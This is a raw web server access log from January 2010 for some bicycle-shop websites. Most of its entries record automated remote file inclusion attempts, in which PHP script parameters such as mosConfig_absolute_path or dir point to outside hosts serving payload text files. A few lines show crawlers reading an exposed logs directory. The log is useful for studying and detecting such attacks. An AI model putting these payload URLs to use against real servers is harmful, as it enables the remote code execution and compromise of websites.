204.15.39.12 - - [10/Jan/2010:08:29:12 -0800] "GET /logs/ HTTP/1.1" 200 2368 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.svbikes.com"
204.15.39.12 - - [10/Jan/2010:08:29:22 -0800] "GET /logs/access.log HTTP/1.1" 200 175931 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.svbikes.com"
204.15.39.12 - - [10/Jan/2010:08:29:23 -0800] "GET /logs/access_090310.log HTTP/1.1" 200 65536 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.svbikes.com"
204.15.39.12 - - [10/Jan/2010:08:29:23 -0800] "GET /logs/access_090410.log HTTP/1.1" 200 131072 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.svbikes.com"
204.15.39.12 - - [10/Jan/2010:08:29:23 -0800] "GET /logs/access_090510.log HTTP/1.1" 200 65536 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.svbikes.com"
204.15.39.12 - - [10/Jan/2010:08:29:23 -0800] "GET /logs/access_090610.log HTTP/1.1" 200 0 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.svbikes.com"
204.15.39.12 - - [10/Jan/2010:08:29:23 -0800] "GET /logs/access_090710.log HTTP/1.1" 200 0 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.svbikes.com"
204.15.39.12 - - [10/Jan/2010:08:29:24 -0800] "GET /logs/access_090810.log HTTP/1.1" 200 65536 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.svbikes.com"
204.15.39.12 - - [10/Jan/2010:08:29:24 -0800] "GET /logs/access_090910.log HTTP/1.1" 200 131072 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.svbikes.com"
204.15.39.12 - - [10/Jan/2010:08:29:24 -0800] "GET /logs/access_091010.log HTTP/1.1" 200 131072 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.svbikes.com"
204.15.39.12 - - [10/Jan/2010:08:29:24 -0800] "GET /logs/access_091110.log HTTP/1.1" 200 65536 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.svbikes.com"
204.15.39.12 - - [10/Jan/2010:08:29:24 -0800] "GET /logs/access_091210.log HTTP/1.1" 200 65536 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.svbikes.com"
204.15.39.12 - - [10/Jan/2010:08:29:33 -0800] "GET /logs/access_100110.log HTTP/1.1" 200 5478709 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.svbikes.com"
204.15.39.12 - - [10/Jan/2010:08:29:35 -0800] "GET /logs/scripts.log HTTP/1.1" 200 65099 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.svbikes.com"
203.253.25.15 - - [10/Jan/2010:08:30:45 -0800] "GET /aws/awstats052008.txt%22%20class=%22neww%22%20target=%22_blank%22%20title=%22Im%20neuen%20Fenster%20öffnen//skin/zero_vote/ask_password.php?dir=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [10/Jan/2010:08:30:45 -0800] "GET /logs//aws/awstats052008.txt%22%20class=%22neww%22%20target=%22_blank%22%20title=%22Im%20neuen%20Fenster%20öffnen//skin/zero_vote/ask_password.php?dir=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [10/Jan/2010:08:30:46 -0800] "GET /logs/access.log%20%20//aws/awstats052008.txt%22%20class=%22neww%22%20target=%22_blank%22%20title=%22Im%20neuen%20Fenster%20öffnen//skin/zero_vote/ask_password.php?dir=http://www.o-ta.com.tw//appserv/joh1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.131.226.52 - - [10/Jan/2010:08:30:50 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
202.131.226.52 - - [10/Jan/2010:08:30:50 -0800] "GET /logs/access.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.72.62.107 - - [10/Jan/2010:08:34:13 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.72.62.107 - - [10/Jan/2010:08:34:13 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.72.62.107 - - [10/Jan/2010:08:34:14 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.72.62.107 - - [10/Jan/2010:08:34:15 -0800] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.126.127.34 - - [10/Jan/2010:08:36:04 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.126.127.34 - - [10/Jan/2010:08:36:05 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.126.127.34 - - [10/Jan/2010:08:36:24 -0800] "GET /logs/access.log%20%20//skin/zero_vote/ask_password.php?dir=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.88.25.28 - - [10/Jan/2010:08:38:49 -0800] "GET /Employeesite/ HTTP/1.1" 401 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "bicyclestoreshouston.com"
207.191.225.96 - - [10/Jan/2010:08:39:48 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [10/Jan/2010:08:39:48 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [10/Jan/2010:08:39:50 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.200.203.11 - - [10/Jan/2010:08:40:08 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.200.203.11 - - [10/Jan/2010:08:40:08 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.200.203.11 - - [10/Jan/2010:08:40:08 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.126.127.34 - - [10/Jan/2010:08:42:14 -0800] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.200.203.11 - - [10/Jan/2010:08:42:32 -0800] "GET /logs/access.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [10/Jan/2010:08:44:58 -0800] "GET /logs/access.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.93.208.12 - - [10/Jan/2010:08:46:03 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.93.208.12 - - [10/Jan/2010:08:46:03 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.93.208.12 - - [10/Jan/2010:08:46:03 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.72.62.107 - - [10/Jan/2010:08:49:23 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.72.62.107 - - [10/Jan/2010:08:49:23 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.72.62.107 - - [10/Jan/2010:08:49:23 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.72.62.107 - - [10/Jan/2010:08:49:23 -0800] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.72.62.107 - - [10/Jan/2010:08:51:38 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.72.62.107 - - [10/Jan/2010:08:51:39 -0800] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.72.62.107 - - [10/Jan/2010:08:54:42 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.72.62.107 - - [10/Jan/2010:08:54:45 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.72.62.107 - - [10/Jan/2010:08:54:45 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.72.62.107 - - [10/Jan/2010:08:54:50 -0800] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.72.62.107 - - [10/Jan/2010:08:55:46 -0800] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.72.62.107 - - [10/Jan/2010:08:55:46 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.72.62.107 - - [10/Jan/2010:08:55:46 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.72.62.107 - - [10/Jan/2010:08:55:46 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.93.208.12 - - [10/Jan/2010:08:56:29 -0800] "GET /logs/access.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.94.62 - - [10/Jan/2010:08:58:12 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.94.62 - - [10/Jan/2010:08:58:12 -0800] "GET /logs///include/print_category.php?setup[use_category]=1&dir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.94.62 - - [10/Jan/2010:08:58:12 -0800] "GET /logs/access.log%20%20///include/print_category.php?setup[use_category]=1&dir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.181.198.72 - - [10/Jan/2010:08:58:16 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.181.198.72 - - [10/Jan/2010:08:58:16 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.181.198.72 - - [10/Jan/2010:08:58:16 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.94.62 - - [10/Jan/2010:08:59:33 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.94.62 - - [10/Jan/2010:08:59:33 -0800] "GET /logs///include/print_category.php?setup[use_category]=1&dir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.94.62 - - [10/Jan/2010:08:59:33 -0800] "GET /logs/access.log%20%20///include/print_category.php?setup[use_category]=1&dir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
119.63.198.10 - - [10/Jan/2010:09:02:27 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.svbikes.com"
189.72.62.107 - - [10/Jan/2010:09:07:47 -0800] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.72.62.107 - - [10/Jan/2010:09:07:52 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.72.62.107 - - [10/Jan/2010:09:08:05 -0800] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.72.62.107 - - [10/Jan/2010:09:08:06 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.125.222.82 - - [10/Jan/2010:09:08:45 -0800] "GET /main.php?sayfa=http://www.promisedrealty.com/mortcalcplus/includes/smarty/templates_c/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.125.222.82 - - [10/Jan/2010:09:08:45 -0800] "GET /logs/access.log%20%20//main.php?sayfa=http://www.promisedrealty.com/mortcalcplus/includes/smarty/templates_c/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.125.222.82 - - [10/Jan/2010:09:08:45 -0800] "GET /logs//main.php?sayfa=http://www.promisedrealty.com/mortcalcplus/includes/smarty/templates_c/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.115.6.10 - - [10/Jan/2010:09:09:37 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "bicyclestoreshouston.com"
174.120.144.170 - - [10/Jan/2010:09:10:30 -0800] "GET /logs/access.log%20%20///skin/buzzard_espoon/setup.php?dir=http://www.fileden.com/files/2009/12/18/2693460/fxd.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.144.170 - - [10/Jan/2010:09:10:30 -0800] "GET /logs///skin/buzzard_espoon/setup.php?dir=http://www.fileden.com/files/2009/12/18/2693460/fxd.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.144.170 - - [10/Jan/2010:09:10:38 -0800] "GET /logs/access.log%20%20///skin/buzzard_espoon/setup.php?dir=http://www.fileden.com/files/2009/12/18/2693460/fxd.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.144.170 - - [10/Jan/2010:09:10:38 -0800] "GET /logs///skin/buzzard_espoon/setup.php?dir=http://www.fileden.com/files/2009/12/18/2693460/fxd.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.144.170 - - [10/Jan/2010:09:10:38 -0800] "GET //skin/buzzard_espoon/setup.php?dir=http://www.fileden.com/files/2009/12/18/2693460/fxd.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.181.198.72 - - [10/Jan/2010:09:11:38 -0800] "GET /logs/access.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [10/Jan/2010:09:12:10 -0800] "GET /logs//aws//components/com_hashcash/server.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [10/Jan/2010:09:12:10 -0800] "GET /logs/access.log%20%20//aws//components/com_hashcash/server.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [10/Jan/2010:09:12:11 -0800] "GET /logs//aws//components/com_hashcash/server.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [10/Jan/2010:09:12:11 -0800] "GET /logs/access.log%20%20//aws//components/com_hashcash/server.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.253.25.15 - - [10/Jan/2010:09:12:11 -0800] "GET /aws//components/com_hashcash/server.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.144.170 - - [10/Jan/2010:09:13:03 -0800] "GET /logs/access.log///skin/buzzard_espoon/setup.php?dir=http://www.fileden.com/files/2009/12/18/2693460/fxd.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.144.170 - - [10/Jan/2010:09:13:14 -0800] "GET /logs/access.log///skin/buzzard_espoon/setup.php?dir=http://www.fileden.com/files/2009/12/18/2693460/fxd.txt????? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.125.222.82 - - [10/Jan/2010:09:17:31 -0800] "GET /logs/access.log//main.php?sayfa=http://www.promisedrealty.com/mortcalcplus/includes/smarty/templates_c/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
83.103.72.130 - - [10/Jan/2010:09:18:18 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.anabolex.com/gallery/uploads/2855/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
83.103.72.130 - - [10/Jan/2010:09:18:18 -0800] "GET /logs/access.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.anabolex.com/gallery/uploads/2855/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.88.25.28 - - [10/Jan/2010:09:25:24 -0800] "GET /logs/access.log HTTP/1.1" 200 195340 "-" "Yandex/1.01.001 (compatible; Win16; I)" "houstonbikeshop.com"
62.67.235.148 - - [10/Jan/2010:09:34:38 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
62.67.235.148 - - [10/Jan/2010:09:34:39 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
62.67.235.148 - - [10/Jan/2010:09:34:39 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
62.67.235.148 - - [10/Jan/2010:09:34:39 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
62.67.235.148 - - [10/Jan/2010:09:34:39 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
62.67.235.148 - - [10/Jan/2010:09:34:39 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
83.103.72.130 - - [10/Jan/2010:09:34:45 -0800] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.anabolex.com/gallery/uploads/2855/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
195.5.163.207 - - [10/Jan/2010:09:35:10 -0800] "GET /logs//appserv/main.php?appserv_root=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
195.5.163.207 - - [10/Jan/2010:09:35:10 -0800] "GET /appserv/main.php?appserv_root=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
195.5.163.207 - - [10/Jan/2010:09:35:10 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.44.94.145 - - [10/Jan/2010:09:37:22 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.balipost.com/polling//test.txt?? HTTP/1.1" 404 - "-" "Microsoft Pocket Internet Explorer/0.6" "houstonbikeshop.com"
72.44.94.145 - - [10/Jan/2010:09:37:23 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.balipost.com/polling//test.txt?? HTTP/1.1" 404 - "-" "Microsoft Pocket Internet Explorer/0.6" "houstonbikeshop.com"
174.120.144.170 - - [10/Jan/2010:09:42:47 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.fileden.com/files/2009/12/18/2693460/fxd.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.144.170 - - [10/Jan/2010:09:42:47 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.fileden.com/files/2009/12/18/2693460/fxd.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.144.170 - - [10/Jan/2010:09:42:47 -0800] "GET /logs/access.log%20%20//bbs//skin/zero_vote/ask_password.php?dir=http://www.fileden.com/files/2009/12/18/2693460/fxd.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
195.5.163.207 - - [10/Jan/2010:09:43:11 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.115.6.15 - - [10/Jan/2010:09:48:26 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.svbikes.com"
174.120.144.170 - - [10/Jan/2010:09:49:00 -0800] "GET /logs/access.log%20%20//bbs//skin/zero_vote/ask_password.php?dir=http://www.fileden.com/files/2009/12/18/2693460/fxd.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.144.170 - - [10/Jan/2010:09:49:00 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.fileden.com/files/2009/12/18/2693460/fxd.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.144.170 - - [10/Jan/2010:09:49:00 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.fileden.com/files/2009/12/18/2693460/fxd.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
